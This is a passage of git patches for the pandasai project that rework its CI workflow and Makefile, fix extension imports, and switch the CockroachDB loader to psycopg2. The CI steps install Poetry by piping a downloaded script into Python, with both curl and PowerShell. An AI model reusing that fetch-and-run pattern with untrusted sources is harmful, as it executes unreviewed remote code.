- echo "C:\\Users\\runneradmin\\AppData\\Roaming\\Python\\Scripts" >> $env:GITHUB_PATH
+ if [[ "${{ matrix.os }}" == "windows-latest" ]]; then
+ (Invoke-WebRequest -Uri https://install.python-poetry.org -UseBasicParsing).Content | python -
+ echo "C:\\Users\\runneradmin\\AppData\\Roaming\\Python\\Scripts" >> $env:GITHUB_PATH
+ else
+ curl -sSL https://install.python-poetry.org | python3 -
+ echo 'export PATH="$HOME/.local/bin:$PATH"' >> $GITHUB_ENV
+ fi
+
- name: Verify Poetry Installation
run: poetry --version
+
- name: Clear Poetry Cache
run: poetry cache clear pypi --all
- - name: Install future
- run: pip wheel --use-pep517 "future==0.18.3"
+
- name: Install dependencies
run: poetry install --all-extras --with dev --verbose
+
- name: Install extension dependencies
run: |
find extensions/ -mindepth 1 -type d \( \
@@ -51,10 +54,11 @@ jobs:
)
fi
done
+ if: matrix.os != 'windows-latest'
+
- name: Install extension dependencies (Windows)
if: matrix.os == 'windows-latest'
run: |
- # Install LLM extension dependencies
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -65,7 +69,6 @@ jobs:
}
}
- # Install connector extension dependencies
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -76,7 +79,6 @@ jobs:
}
}
- # Install enterprise extension dependencies
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -86,19 +88,22 @@ jobs:
Pop-Location
}
}
- - name: Lint with ruff
+
+ - name: Run Linting
run: make format_diff
- - name: Spellcheck
+
+ - name: Run Spellcheck
run: make spell_check
- - name: Run core tests
+
+ - name: Run Core Tests
run: make test_core
- - name: Run extension tests
- if: matrix.os != 'windows-latest'
+
+ - name: Run Extension Tests
run: make test_extensions
- - name: Run extension tests (Windows)
- if: matrix.os == 'windows-latest'
+ if: matrix.os != 'windows-latest'
+
+ - name: Run Extension Tests (Windows)
run: |
- # Run LLM extension tests
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -109,7 +114,6 @@ jobs:
}
}
- # Run connector extension tests
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -120,7 +124,6 @@ jobs:
}
}
- # Run enterprise extension tests
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -130,12 +133,14 @@ jobs:
Pop-Location
}
}
- - name: Run code coverage
+
+ - name: Run Code Coverage
continue-on-error: true
run: |
poetry run coverage run --source=pandasai,extensions -m pytest tests extensions/*/tests extensions/ee/*/tests --ignore=tests/integration_tests
poetry run coverage xml
- - name: Report coverage
+
+ - name: Report Coverage
uses: codecov/codecov-action@v3
with:
token: ${{ secrets.CODECOV_TOKEN }}
From c2d60815b84f11ad530a31b5099672a23289de3f Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:59:48 +0100
Subject: [PATCH 30/58] fix: ci
---
.github/workflows/ci.yml | 58 +++++++++++++++++++---------------------
1 file changed, 27 insertions(+), 31 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index ddbd72e3a..90b82fc48 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,4 +1,4 @@
-name: CI
+name: ci
on:
push:
@@ -15,31 +15,29 @@ jobs:
steps:
- uses: actions/checkout@v3
-
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- - name: Install Poetry
+ - name: Install Poetry (Unix)
+ if: matrix.os != 'windows-latest'
run: |
- if [[ "${{ matrix.os }}" == "windows-latest" ]]; then
- (Invoke-WebRequest -Uri https://install.python-poetry.org -UseBasicParsing).Content | python -
- echo "C:\\Users\\runneradmin\\AppData\\Roaming\\Python\\Scripts" >> $env:GITHUB_PATH
- else
- curl -sSL https://install.python-poetry.org | python3 -
- echo 'export PATH="$HOME/.local/bin:$PATH"' >> $GITHUB_ENV
- fi
-
+ curl -sSL https://install.python-poetry.org | python3 -
+ echo 'export PATH="$HOME/.local/bin:$PATH"' >> $GITHUB_ENV
+ - name: Install Poetry (Windows)
+ if: matrix.os == 'windows-latest'
+ run: |
+ (Invoke-WebRequest -Uri https://install.python-poetry.org -UseBasicParsing).Content | python -
+ echo "C:\\Users\\runneradmin\\AppData\\Roaming\\Python\\Scripts" >> $env:GITHUB_PATH
- name: Verify Poetry Installation
run: poetry --version
-
- name: Clear Poetry Cache
run: poetry cache clear pypi --all
-
+ - name: Install future
+ run: pip wheel --use-pep517 "future==0.18.3"
- name: Install dependencies
run: poetry install --all-extras --with dev --verbose
-
- name: Install extension dependencies
run: |
find extensions/ -mindepth 1 -type d \( \
@@ -54,11 +52,10 @@ jobs:
)
fi
done
- if: matrix.os != 'windows-latest'
-
- name: Install extension dependencies (Windows)
if: matrix.os == 'windows-latest'
run: |
+ # Install LLM extension dependencies
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -69,6 +66,7 @@ jobs:
}
}
+ # Install connector extension dependencies
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -79,6 +77,7 @@ jobs:
}
}
+ # Install enterprise extension dependencies
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -88,22 +87,19 @@ jobs:
Pop-Location
}
}
-
- - name: Run Linting
+ - name: Lint with ruff
run: make format_diff
-
- - name: Run Spellcheck
+ - name: Spellcheck
run: make spell_check
-
- - name: Run Core Tests
+ - name: Run core tests
run: make test_core
-
- - name: Run Extension Tests
- run: make test_extensions
+ - name: Run extension tests
if: matrix.os != 'windows-latest'
-
- - name: Run Extension Tests (Windows)
+ run: make test_extensions
+ - name: Run extension tests (Windows)
+ if: matrix.os == 'windows-latest'
run: |
+ # Run LLM extension tests
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -114,6 +110,7 @@ jobs:
}
}
+ # Run connector extension tests
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -124,6 +121,7 @@ jobs:
}
}
+ # Run enterprise extension tests
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -133,14 +131,12 @@ jobs:
Pop-Location
}
}
-
- - name: Run Code Coverage
+ - name: Run code coverage
continue-on-error: true
run: |
poetry run coverage run --source=pandasai,extensions -m pytest tests extensions/*/tests extensions/ee/*/tests --ignore=tests/integration_tests
poetry run coverage xml
-
- - name: Report Coverage
+ - name: Report coverage
uses: codecov/codecov-action@v3
with:
token: ${{ secrets.CODECOV_TOKEN }}
From eb41a18c2abf5b303b80fc459e425929651d9555 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:05:03 +0100
Subject: [PATCH 31/58] fix make file for hardcoded env
---
Makefile | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Makefile b/Makefile
index 7bf6ed49a..3680b4dd3 100644
--- a/Makefile
+++ b/Makefile
@@ -9,9 +9,9 @@ all: help ## default target executed when no arguments are given to make
UNIT_TESTS_DIR ?= tests/unit_tests/
INTEGRATION_TESTS_DIR ?= tests/integration_tests/
-setup_python: ## ensure we're using Python 3.10
- @echo "Setting up Python 3.10..."
- poetry env use python3.10
+# setup_python: ## ensure we're using Python 3.10
+# @echo "Setting up Python 3.10..."
+# poetry env use python3.10
install_deps: setup_python ## install core dependencies
@echo "Installing core dependencies..."
From 1afd565c9b44c3894055e7b92fce3c985aec567d Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:07:06 +0100
Subject: [PATCH 32/58] fix make file for hardcoded env
---
Makefile | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Makefile b/Makefile
index 3680b4dd3..1ba22501c 100644
--- a/Makefile
+++ b/Makefile
@@ -26,7 +26,7 @@ install_extension_deps: setup_python ## install all extension dependencies
@for dir in extensions/llms/*/; do \
if [ -f "$$dir/pyproject.toml" ]; then \
echo "Installing dependencies for $$dir"; \
- cd "$$dir" && poetry env use python3.10 && poetry install --all-extras --with test && cd - || exit 1; \
+ cd "$$dir" && poetry install --all-extras --with test && cd - || exit 1; \
fi \
done
@@ -34,7 +34,7 @@ install_extension_deps: setup_python ## install all extension dependencies
@for dir in extensions/connectors/*/; do \
if [ -f "$$dir/pyproject.toml" ]; then \
echo "Installing dependencies for $$dir"; \
- cd "$$dir" && poetry env use python3.10 && poetry install --all-extras --with test && cd - || exit 1; \
+ cd "$$dir" && poetry install --all-extras --with test && cd - || exit 1; \
fi \
done
@@ -42,7 +42,7 @@ install_extension_deps: setup_python ## install all extension dependencies
@for dir in extensions/ee/*/*/; do \
if [ -f "$$dir/pyproject.toml" ]; then \
echo "Installing dependencies for $$dir"; \
- cd "$$dir" && poetry env use python3.10 && poetry install --all-extras --with test && cd - || exit 1; \
+ cd "$$dir" && poetry install --all-extras --with test && cd - || exit 1; \
fi \
done
From b183fac7c1e3c315291941335c1696792c5e76f0 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:16:43 +0100
Subject: [PATCH 33/58] fix make file for hardcoded env
---
.github/workflows/ci.yml | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 90b82fc48..4b41e9aba 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -103,7 +103,7 @@ jobs:
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
- Write-Host "Running tests for $_"
+ Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
poetry run pytest tests/
Pop-Location
@@ -114,7 +114,7 @@ jobs:
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
- Write-Host "Running tests for $_"
+ Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
poetry run pytest tests/
Pop-Location
@@ -125,7 +125,7 @@ jobs:
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
- Write-Host "Running tests for $_"
+ Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
poetry run pytest tests/
Pop-Location
From eac2c21598168b101b1787efa2527ce2e695f81b Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:22:33 +0100
Subject: [PATCH 34/58] fix make file for hardcoded env
---
.github/workflows/ci.yml | 1 +
1 file changed, 1 insertion(+)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 4b41e9aba..368b8f1c0 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -39,6 +39,7 @@ jobs:
- name: Install dependencies
run: poetry install --all-extras --with dev --verbose
- name: Install extension dependencies
+ if: matrix.os != 'windows-latest'
run: |
find extensions/ -mindepth 1 -type d \( \
-path "extensions/llms/*" -o \
From 4d5f54ce53bba121301696fb57dc12eabc45c1cb Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:32:14 +0100
Subject: [PATCH 35/58] fix: imports in extensions
---
extensions/llms/google/pandasai_google/google_gemini.py | 2 +-
extensions/llms/google/pandasai_google/google_vertexai.py | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/extensions/llms/google/pandasai_google/google_gemini.py b/extensions/llms/google/pandasai_google/google_gemini.py
index 98c234fbd..76d9d5bed 100644
--- a/extensions/llms/google/pandasai_google/google_gemini.py
+++ b/extensions/llms/google/pandasai_google/google_gemini.py
@@ -2,7 +2,7 @@
from pandasai.exceptions import APIKeyNotFoundError
from pandasai.helpers.memory import Memory
-from pandasai.helpers.optional import import_dependency
+from pandasai.core.code_execution.environment import import_dependency
from .base import BaseGoogle
diff --git a/extensions/llms/google/pandasai_google/google_vertexai.py b/extensions/llms/google/pandasai_google/google_vertexai.py
index 076b9bcf2..33d4c117a 100644
--- a/extensions/llms/google/pandasai_google/google_vertexai.py
+++ b/extensions/llms/google/pandasai_google/google_vertexai.py
@@ -3,7 +3,7 @@
from pandasai.helpers.memory import Memory
from pandasai.exceptions import UnsupportedModelError
-from pandasai.helpers.optional import import_dependency
+from pandasai.core.code_execution.environment import import_dependency
from .base import BaseGoogle
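Both Google LLM files now take `import_dependency` from the code-execution environment module instead of the removed `pandasai.helpers.optional`. A generic sketch of the optional-import pattern such a helper implements — illustrative signature, not the library's exact one:

```python
# Optional-dependency sketch: import lazily, fail with an actionable message.
import importlib

def import_optional(name: str):
    try:
        return importlib.import_module(name)
    except ImportError as exc:
        raise ImportError(
            f"{name} is required for this feature; install it first."
        ) from exc

# genai = import_optional("google.generativeai")  # clear error if absent
```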
From b2ded792d34a4ab9515ba074f9323fa3711d0110 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 15:53:09 +0100
Subject: [PATCH 36/58] fix(testcases): extension test cases fixed
---
.../connectors/sql/pandasai_sql/__init__.py | 10 +-
extensions/connectors/sql/poetry.lock | 106 ++++-
extensions/connectors/sql/pyproject.toml | 6 +
extensions/connectors/sql/tests/test_sql.py | 442 +++++-------------
.../sql/tests/test_sql_connector.py | 36 --
.../connectors/sql/tests/test_sqlite.py | 113 -----
.../yfinance/pandasai_yfinance/__init__.py | 9 +-
.../pandasai_yfinance/yahoo_finance.py | 199 --------
.../yfinance/tests/test_yahoo_finance.py | 169 ++-----
.../pandasai_databricks/__init__.py | 3 +-
.../databricks/tests/test_databricks.py | 199 +++++---
.../oracle/pandasai_oracle/__init__.py | 3 +-
.../ee/connectors/oracle/tests/test_oracle.py | 295 +++++-------
.../snowflake/pandasai_snowflake/__init__.py | 3 +-
.../snowflake/tests/test_snowflake.py | 352 ++++++--------
.../tests/test_huggingface_text_gen.py | 3 +-
.../langchain/tests/test_langchain_llm.py | 25 +-
extensions/llms/local/tests/test_local_llm.py | 2 +-
extensions/llms/openai/tests/test_openai.py | 3 +-
19 files changed, 689 insertions(+), 1289 deletions(-)
delete mode 100644 extensions/connectors/sql/tests/test_sql_connector.py
delete mode 100644 extensions/connectors/sql/tests/test_sqlite.py
delete mode 100644 extensions/connectors/yfinance/pandasai_yfinance/yahoo_finance.py
diff --git a/extensions/connectors/sql/pandasai_sql/__init__.py b/extensions/connectors/sql/pandasai_sql/__init__.py
index cc9f68f56..15f5362ed 100644
--- a/extensions/connectors/sql/pandasai_sql/__init__.py
+++ b/extensions/connectors/sql/pandasai_sql/__init__.py
@@ -35,9 +35,15 @@ def load_from_sqlite(connection_info, query):
def load_from_cockroachdb(connection_info, query):
- import cockroachdb
+ import psycopg2
- conn = cockroachdb.connect(connection_info)
+ conn = psycopg2.connect(
+ host=connection_info["host"],
+ user=connection_info["user"],
+ password=connection_info["password"],
+ dbname=connection_info["database"],
+ port=connection_info["port"],
+ )
return pd.read_sql(query, conn)
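CockroachDB speaks the PostgreSQL wire protocol, which is why `psycopg2` can stand in for the unmaintained `cockroachdb` driver here. A hypothetical usage of the rewritten loader, with placeholder connection values:

```python
from pandasai_sql import load_from_cockroachdb

connection_info = {
    "host": "localhost",
    "user": "root",
    "password": "",
    "database": "defaultdb",
    "port": 26257,  # CockroachDB's default SQL port
}

# Runs the query over psycopg2 and returns a pandas DataFrame.
df = load_from_cockroachdb(connection_info, "SELECT 1 AS ok")
print(df)
```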
diff --git a/extensions/connectors/sql/poetry.lock b/extensions/connectors/sql/poetry.lock
index 6b73ca6a5..5875c9ad2 100644
--- a/extensions/connectors/sql/poetry.lock
+++ b/extensions/connectors/sql/poetry.lock
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 1.8.4 and should not be changed by hand.
+# This file is automatically @generated by Poetry 1.8.5 and should not be changed by hand.
[[package]]
name = "annotated-types"
@@ -147,6 +147,17 @@ files = [
{file = "charset_normalizer-3.4.0.tar.gz", hash = "sha256:223217c3d4f82c3ac5e29032b3f1c2eb0fb591b72161f86d93f5719079dae93e"},
]
+[[package]]
+name = "cockroachdb"
+version = "0.3.5"
+description = "CockroachDB adapter for SQLAlchemy"
+optional = false
+python-versions = "*"
+files = [
+ {file = "cockroachdb-0.3.5-py3-none-any.whl", hash = "sha256:b09904b0381386102f6a613173e7b0ffa01addd56606dd4c807601e14fa054d3"},
+ {file = "cockroachdb-0.3.5.tar.gz", hash = "sha256:cc36de86bdf8b56b24c6b556b0eaf20b7dd6e6a1cd73addd31c0ccc4c99639a2"},
+]
+
[[package]]
name = "colorama"
version = "0.4.6"
@@ -1226,6 +1237,82 @@ files = [
dev = ["pre-commit", "tox"]
testing = ["pytest", "pytest-benchmark"]
+[[package]]
+name = "psycopg2-binary"
+version = "2.9.10"
+description = "psycopg2 - Python-PostgreSQL Database Adapter"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "psycopg2-binary-2.9.10.tar.gz", hash = "sha256:4b3df0e6990aa98acda57d983942eff13d824135fe2250e6522edaa782a06de2"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-macosx_12_0_x86_64.whl", hash = "sha256:0ea8e3d0ae83564f2fc554955d327fa081d065c8ca5cc6d2abb643e2c9c1200f"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-macosx_14_0_arm64.whl", hash = "sha256:3e9c76f0ac6f92ecfc79516a8034a544926430f7b080ec5a0537bca389ee0906"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2ad26b467a405c798aaa1458ba09d7e2b6e5f96b1ce0ac15d82fd9f95dc38a92"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:270934a475a0e4b6925b5f804e3809dd5f90f8613621d062848dd82f9cd62007"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:48b338f08d93e7be4ab2b5f1dbe69dc5e9ef07170fe1f86514422076d9c010d0"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7f4152f8f76d2023aac16285576a9ecd2b11a9895373a1f10fd9db54b3ff06b4"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:32581b3020c72d7a421009ee1c6bf4a131ef5f0a968fab2e2de0c9d2bb4577f1"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:2ce3e21dc3437b1d960521eca599d57408a695a0d3c26797ea0f72e834c7ffe5"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-musllinux_1_2_ppc64le.whl", hash = "sha256:e984839e75e0b60cfe75e351db53d6db750b00de45644c5d1f7ee5d1f34a1ce5"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:3c4745a90b78e51d9ba06e2088a2fe0c693ae19cc8cb051ccda44e8df8a6eb53"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-win32.whl", hash = "sha256:e5720a5d25e3b99cd0dc5c8a440570469ff82659bb09431c1439b92caf184d3b"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-win_amd64.whl", hash = "sha256:3c18f74eb4386bf35e92ab2354a12c17e5eb4d9798e4c0ad3a00783eae7cd9f1"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-macosx_12_0_x86_64.whl", hash = "sha256:04392983d0bb89a8717772a193cfaac58871321e3ec69514e1c4e0d4957b5aff"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-macosx_14_0_arm64.whl", hash = "sha256:1a6784f0ce3fec4edc64e985865c17778514325074adf5ad8f80636cd029ef7c"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5f86c56eeb91dc3135b3fd8a95dc7ae14c538a2f3ad77a19645cf55bab1799c"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2b3d2491d4d78b6b14f76881905c7a8a8abcf974aad4a8a0b065273a0ed7a2cb"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2286791ececda3a723d1910441c793be44625d86d1a4e79942751197f4d30341"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:512d29bb12608891e349af6a0cccedce51677725a921c07dba6342beaf576f9a"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:5a507320c58903967ef7384355a4da7ff3f28132d679aeb23572753cbf2ec10b"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:6d4fa1079cab9018f4d0bd2db307beaa612b0d13ba73b5c6304b9fe2fb441ff7"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-musllinux_1_2_ppc64le.whl", hash = "sha256:851485a42dbb0bdc1edcdabdb8557c09c9655dfa2ca0460ff210522e073e319e"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:35958ec9e46432d9076286dda67942ed6d968b9c3a6a2fd62b48939d1d78bf68"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-win32.whl", hash = "sha256:ecced182e935529727401b24d76634a357c71c9275b356efafd8a2a91ec07392"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-win_amd64.whl", hash = "sha256:ee0e8c683a7ff25d23b55b11161c2663d4b099770f6085ff0a20d4505778d6b4"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-macosx_12_0_x86_64.whl", hash = "sha256:880845dfe1f85d9d5f7c412efea7a08946a46894537e4e5d091732eb1d34d9a0"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-macosx_14_0_arm64.whl", hash = "sha256:9440fa522a79356aaa482aa4ba500b65f28e5d0e63b801abf6aa152a29bd842a"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e3923c1d9870c49a2d44f795df0c889a22380d36ef92440ff618ec315757e539"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b2c956c028ea5de47ff3a8d6b3cc3330ab45cf0b7c3da35a2d6ff8420896526"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f758ed67cab30b9a8d2833609513ce4d3bd027641673d4ebc9c067e4d208eec1"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8cd9b4f2cfab88ed4a9106192de509464b75a906462fb846b936eabe45c2063e"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:6dc08420625b5a20b53551c50deae6e231e6371194fa0651dbe0fb206452ae1f"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:d7cd730dfa7c36dbe8724426bf5612798734bff2d3c3857f36f2733f5bfc7c00"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:155e69561d54d02b3c3209545fb08938e27889ff5a10c19de8d23eb5a41be8a5"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:c3cc28a6fd5a4a26224007712e79b81dbaee2ffb90ff406256158ec4d7b52b47"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-win32.whl", hash = "sha256:ec8a77f521a17506a24a5f626cb2aee7850f9b69a0afe704586f63a464f3cd64"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-win_amd64.whl", hash = "sha256:18c5ee682b9c6dd3696dad6e54cc7ff3a1a9020df6a5c0f861ef8bfd338c3ca0"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-macosx_12_0_x86_64.whl", hash = "sha256:26540d4a9a4e2b096f1ff9cce51253d0504dca5a85872c7f7be23be5a53eb18d"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-macosx_14_0_arm64.whl", hash = "sha256:e217ce4d37667df0bc1c397fdcd8de5e81018ef305aed9415c3b093faaeb10fb"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:245159e7ab20a71d989da00f280ca57da7641fa2cdcf71749c193cea540a74f7"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3c4ded1a24b20021ebe677b7b08ad10bf09aac197d6943bfe6fec70ac4e4690d"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3abb691ff9e57d4a93355f60d4f4c1dd2d68326c968e7db17ea96df3c023ef73"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8608c078134f0b3cbd9f89b34bd60a943b23fd33cc5f065e8d5f840061bd0673"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:230eeae2d71594103cd5b93fd29d1ace6420d0b86f4778739cb1a5a32f607d1f"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:bb89f0a835bcfc1d42ccd5f41f04870c1b936d8507c6df12b7737febc40f0909"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-musllinux_1_2_ppc64le.whl", hash = "sha256:f0c2d907a1e102526dd2986df638343388b94c33860ff3bbe1384130828714b1"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:f8157bed2f51db683f31306aa497311b560f2265998122abe1dce6428bd86567"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-macosx_12_0_x86_64.whl", hash = "sha256:eb09aa7f9cecb45027683bb55aebaaf45a0df8bf6de68801a6afdc7947bb09d4"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b73d6d7f0ccdad7bc43e6d34273f70d587ef62f824d7261c4ae9b8b1b6af90e8"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ce5ab4bf46a211a8e924d307c1b1fcda82368586a19d0a24f8ae166f5c784864"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:056470c3dc57904bbf63d6f534988bafc4e970ffd50f6271fc4ee7daad9498a5"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:73aa0e31fa4bb82578f3a6c74a73c273367727de397a7a0f07bd83cbea696baa"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:8de718c0e1c4b982a54b41779667242bc630b2197948405b7bd8ce16bcecac92"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:5c370b1e4975df846b0277b4deba86419ca77dbc25047f535b0bb03d1a544d44"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-musllinux_1_2_ppc64le.whl", hash = "sha256:ffe8ed017e4ed70f68b7b371d84b7d4a790368db9203dfc2d222febd3a9c8863"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:8aecc5e80c63f7459a1a2ab2c64df952051df196294d9f739933a9f6687e86b3"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-macosx_12_0_x86_64.whl", hash = "sha256:7a813c8bdbaaaab1f078014b9b0b13f5de757e2b5d9be6403639b298a04d218b"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d00924255d7fc916ef66e4bf22f354a940c67179ad3fd7067d7a0a9c84d2fbfc"},
